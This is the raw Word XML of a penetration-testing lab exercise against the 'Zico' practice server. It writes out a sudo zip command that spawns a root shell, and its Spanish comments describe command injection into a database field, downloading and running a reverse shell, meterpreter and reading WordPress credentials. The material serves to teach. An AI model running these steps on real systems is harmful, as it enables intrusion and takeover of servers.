    <w:p w14:paraId="380F3D0D" w14:textId="77777777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268EC4E7" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5484920E" w14:textId="7A68E360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24E7C4CD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EB0F180" w14:textId="77777777" w:rsidR="006671EB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noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:pict w14:anchorId="4FCB8664">
                <v:shape id="_x0000_i1060" type="#_x0000_t75" style="width:441.5pt;height:71.3pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId35" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F83179" w14:textId="6A75A7BD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1A27D2D9" w14:textId="77777777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51E9B6EB" w14:textId="1E807552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41219E56" w14:textId="41C41106" w:rsidR="00016EE5" w:rsidRDefault="00016EE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37086B2A" w14:textId="4BDCA5F9" w:rsidR="00537CDB" w:rsidRPr="00537CDB" w:rsidRDefault="00537CDB" w:rsidP="00537CDB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc17521201"/>
      <w:r w:rsidRPr="00537CDB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Optional: (No Mandatory)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="2AE8487A" w14:textId="78282460" w:rsidR="0002266D" w:rsidRDefault="0002266D" w:rsidP="0002266D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc17521202"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>FLAG</w:t>
      </w:r>
      <w:r w:rsidRPr="001A04B5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001A04B5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get access as root (Elevation of privileges)!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="037E9A0B" w14:textId="77777777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0DD74633" w14:textId="17E9E839" w:rsidR="006671EB" w:rsidRDefault="00016EE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Even if you are connected as Zico, you can not access to /root because Zico is </w:t>
      </w:r>
      <w:r w:rsidRPr="00016EE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>not</w:t>
      </w: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root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1572F7" w14:textId="2DA40128" w:rsidR="006671EB" w:rsidRDefault="00016EE5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So, you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gram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perform another</w:t>
      </w:r>
      <w:r w:rsidR="0002266D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack called Elevation of privileges. Try with the commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD23C4" w14:textId="63E1CD93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p w14:paraId="68986328" w14:textId="45D8C2FF" w:rsidR="0002266D" w:rsidRDefault="0002266D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sudo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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B7F5E" w14:textId="77777777" w:rsidR="0002266D" w:rsidRDefault="0002266D" w:rsidP="0002266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sudo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-u root zip /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tm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>/exploit.zip /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tmp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>/exploit -T --unzip-command=”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c /bin/bash”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1C662A" w14:textId="0E882E9B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3CCF7AE0" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E5E6BF" w14:textId="1EDBED2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7625A5C4" w14:textId="1D553DAD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A2BD7DB" w14:textId="6B2124D4" w:rsidR="006671EB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2F04EDBC">
                <v:shape id="_x0000_i1061" type="#_x0000_t75" style="width:441.5pt;height:84.9pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId36" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A17C438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0A79F6ED" w14:textId="0698615D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6671EB" w:rsidRPr="00853EC8" w14:paraId="3139A22E" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22681092" w14:textId="658372FD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Replace this screenshot with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EDF481F" w14:textId="56DEC2E6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3AE7D24A" w14:textId="11A5DE1E" w:rsidR="006671EB" w:rsidRPr="00853EC8" w:rsidRDefault="00960C98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>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:pict w14:anchorId="6A7B2777">
                <v:shape id="_x0000_i1062" type="#_x0000_t75" style="width:442.2pt;height:181.35pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId37" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="6538058B" w14:textId="77777777" w:rsidR="006671EB" w:rsidRPr="00853EC8" w:rsidRDefault="006671EB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4E73FE46" w14:textId="77777777" w:rsidR="00B77446" w:rsidRDefault="00B77446" w:rsidP="00F574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54"/>
      </w:tblGrid>
      <w:tr w:rsidR="00016EE5" w:rsidRPr="00960C98" w14:paraId="77492447" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="104DAE72" w14:textId="644F77EA" w:rsidR="00016EE5" w:rsidRPr="00853EC8" w:rsidRDefault="00016EE5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Explain</w:t>
            </w:r>
            <w:r w:rsidR="0002266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</w:t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the</w:t>
            </w:r>
            <w:r w:rsidR="0002266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purpose of the</w:t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following line and </w:t>
            </w:r>
            <w:r w:rsidR="0002266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say why </w:t>
            </w:r>
            <w:r w:rsidR="0002266D" w:rsidRPr="00853EC8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="es-CO"/>
              </w:rPr>
              <w:t>after</w:t>
            </w:r>
            <w:r w:rsidR="00E86584" w:rsidRPr="00853EC8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="es-CO"/>
              </w:rPr>
              <w:t xml:space="preserve"> (no before)</w:t>
            </w:r>
            <w:r w:rsidR="0002266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inserting it</w:t>
            </w:r>
            <w:r w:rsidR="00E86584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,</w:t>
            </w:r>
            <w:r w:rsidR="0002266D"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</w:t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it is </w:t>
            </w:r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lastRenderedPageBreak/>
              <w:t xml:space="preserve">possible to see the path root folder: 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sudo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-u root zip /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tmp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/exploit.zip /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tmp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/exploit -T --unzip-command=”</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00853EC8"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  <w:t xml:space="preserve"> -c /bin/bash”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B82792" w14:textId="77777777" w:rsidR="00E86584" w:rsidRPr="00853EC8" w:rsidRDefault="00E86584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1B6739AF" w14:textId="77777777" w:rsidR="00016EE5" w:rsidRPr="00853EC8" w:rsidRDefault="00016EE5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  <w:p w14:paraId="6A8123D9" w14:textId="7635FD92" w:rsidR="00016EE5" w:rsidRPr="00853EC8" w:rsidRDefault="00016EE5" w:rsidP="00853EC8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sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="es-CO"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31FF79FC" w14:textId="77777777" w:rsidR="008B5A06" w:rsidRPr="00016EE5" w:rsidRDefault="008B5A06" w:rsidP="002D429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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008B5A06" w:rsidRPr="00016EE5" w:rsidSect="003A6BC7">
      <w:headerReference w:type="default" r:id="rId3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DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:00:00Z" w:initials="DODL">
    <w:p w14:paraId="4DFC3D8C" w14:textId="36978266" w:rsidR="009879E3" w:rsidRDefault="009879E3">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Nombre de la tabla</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="2" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:00:00Z" w:initials="DODL">
    <w:p w14:paraId="02375082" w14:textId="2739F7A0" w:rsidR="00960C98" w:rsidRDefault="00960C98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Nombre del </w:t>
      </w:r>
      <w:r w:rsidR="009879E3">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:t>campo dentro de la tabla</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="3" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:01:00Z" w:initials="DODL">
    <w:p w14:paraId="75DD6E4B" w14:textId="1713403E" w:rsidR="009879E3" w:rsidRDefault="009879E3">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Tipo de valor que contendrá el campo</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="4" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:01:00Z" w:initials="DODL">
    <w:p w14:paraId="589436CE" w14:textId="7A3536C6" w:rsidR="009879E3" w:rsidRDefault="009879E3">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Valor del campo, en este caso estamos inyectando 4 comandos de sistema operativo separados por punto y coma (;)</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="5" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:04:00Z" w:initials="DODL">
    <w:p w14:paraId="60C70D56" w14:textId="6A2E8BBA" w:rsidR="009879E3" w:rsidRPr="009879E3" w:rsidRDefault="009879E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879E3">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Make a </w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of all the screen that </w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ate of creation</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="6" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:04:00Z" w:initials="DODL">
    <w:p w14:paraId="5C3A71FF" w14:textId="74328B40" w:rsidR="009879E3" w:rsidRPr="009879E3" w:rsidRDefault="009879E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879E3">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Make a </w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of all the screen that </w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ate of creation</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="7" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:04:00Z" w:initials="DODL">
    <w:p w14:paraId="10A8664F" w14:textId="1C9D5E61" w:rsidR="009879E3" w:rsidRPr="009879E3" w:rsidRDefault="009879E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879E3">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Make a </w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of all the screen that </w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ate of creation</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="8" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:03:00Z" w:initials="DODL">
    <w:p w14:paraId="29C0B00D" w14:textId="0B7E644A" w:rsidR="009879E3" w:rsidRPr="009879E3" w:rsidRDefault="009879E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879E3">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Make a </w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of all the screen that </w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009879E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ate of creation</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="9" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:12:00Z" w:initials="DODL">
    <w:p w14:paraId="076BA659" w14:textId="5F4CB6A4" w:rsidR="009C523A" w:rsidRDefault="009C523A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>La obtenida con estos 4 comandos de sistema operativo</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="12" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:25:00Z" w:initials="DODL">
    <w:p w14:paraId="1CFBE6B0" w14:textId="41BAE299" w:rsidR="00C772A1" w:rsidRDefault="00C772A1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Aquí creamos un proceso en la maquina atacante que espera a que el Shell sea ejecutado en el servidor ZICO. Dejar esta ventana abierta porque mas adelante vamos a volver a ella.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="13" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:18:00Z" w:initials="DODL">
    <w:p w14:paraId="48920237" w14:textId="0FAF7094" w:rsidR="009C523A" w:rsidRDefault="009C523A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>En esta carpeta vamos a almacenar el Shell descargado</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="14" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:17:00Z" w:initials="DODL">
    <w:p w14:paraId="2FD231C0" w14:textId="3FAC1AEE" w:rsidR="009C523A" w:rsidRDefault="009C523A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> es un comando para navegar en internet</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="15" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:15:00Z" w:initials="DODL">
    <w:p w14:paraId="1D079995" w14:textId="5F6E918A" w:rsidR="009C523A" w:rsidRDefault="009C523A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reemplazar esta línea por la que corresponda según el nombre del archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que hayan creado en el paso anterior</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="16" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:19:00Z" w:initials="DODL">
    <w:p w14:paraId="2BC1BE72" w14:textId="09BB33FC" w:rsidR="009C523A" w:rsidRDefault="009C523A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aquí le damos permisos de ejecución al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
  </w:comment>
  <w:comment w:id="17" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:19:00Z" w:initials="DODL">
    <w:p w14:paraId="6DC5F015" w14:textId="44AB876C" w:rsidR="009C523A" w:rsidRDefault="009C523A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aquí ejecutamos el Shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellDanielDiaz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
  </w:comment>
  <w:comment w:id="18" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:20:00Z" w:initials="DODL">
    <w:p w14:paraId="263C2221" w14:textId="0EE81C2E" w:rsidR="009C523A" w:rsidRDefault="009C523A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">En esta línea hacemos que se ejecute el código del campo 1 de la base de datos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C772A1">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C772A1">
        <w:t xml:space="preserve">, que es el código que hace la obtención del Shell desde el equipo atacante hacia el servidor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C772A1">
        <w:t>Zico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
  </w:comment>
  <w:comment w:id="19" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:26:00Z" w:initials="DODL">
    <w:p w14:paraId="3993CF4A" w14:textId="587209A8" w:rsidR="00C772A1" w:rsidRDefault="00C772A1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lo que aparece debajo de “&gt; run” es lo que nos indica que el Shell fue ejecutado en el servidor ZICO y que ahora ESTAMOS CONECTADOS REMOTAMENTE A ZICO!!!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> YA ESTAMOS DENTRO DEL SERVIDOR</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="21" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:28:00Z" w:initials="DODL">
    <w:p w14:paraId="75DCBE02" w14:textId="41C21356" w:rsidR="00C772A1" w:rsidRDefault="00C772A1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Este comando nos trae una consola de ZICO</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="22" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:29:00Z" w:initials="DODL">
    <w:p w14:paraId="4D6CA2BB" w14:textId="2AB51C46" w:rsidR="00C772A1" w:rsidRDefault="00C772A1">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Este comando permite que todo lo que ejecutemos sea interpretado como comando de sistema operativo</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="23" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:31:00Z" w:initials="DODL">
    <w:p w14:paraId="1F585F70" w14:textId="5655A7B6" w:rsidR="00537CDB" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> es un gestor de contenidos muy popular en el mundo que permite crear páginas web de comercio electrónico (Como la de ZICO) de manera muy fácil</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="24" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:32:00Z" w:initials="DODL">
    <w:p w14:paraId="2F0FC3C4" w14:textId="3113A52C" w:rsidR="00537CDB" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Este archivo siempre es encontrado en las instalaciones de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y contiene los datos de usuario de la página, por ello vale mucho la pena revisarlo para ver si encontramos algo interesante</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="25" w:author="DANIEL ORLANDO DIAZ LOPEZ" w:date="2019-08-24T06:36:00Z" w:initials="DODL">
    <w:p w14:paraId="59B45E2D" w14:textId="57037C07" w:rsidR="00537CDB" w:rsidRDefault="00537CDB">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Para volver del Shell de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Zico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Server a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> utilizar el comando: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00537CDB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
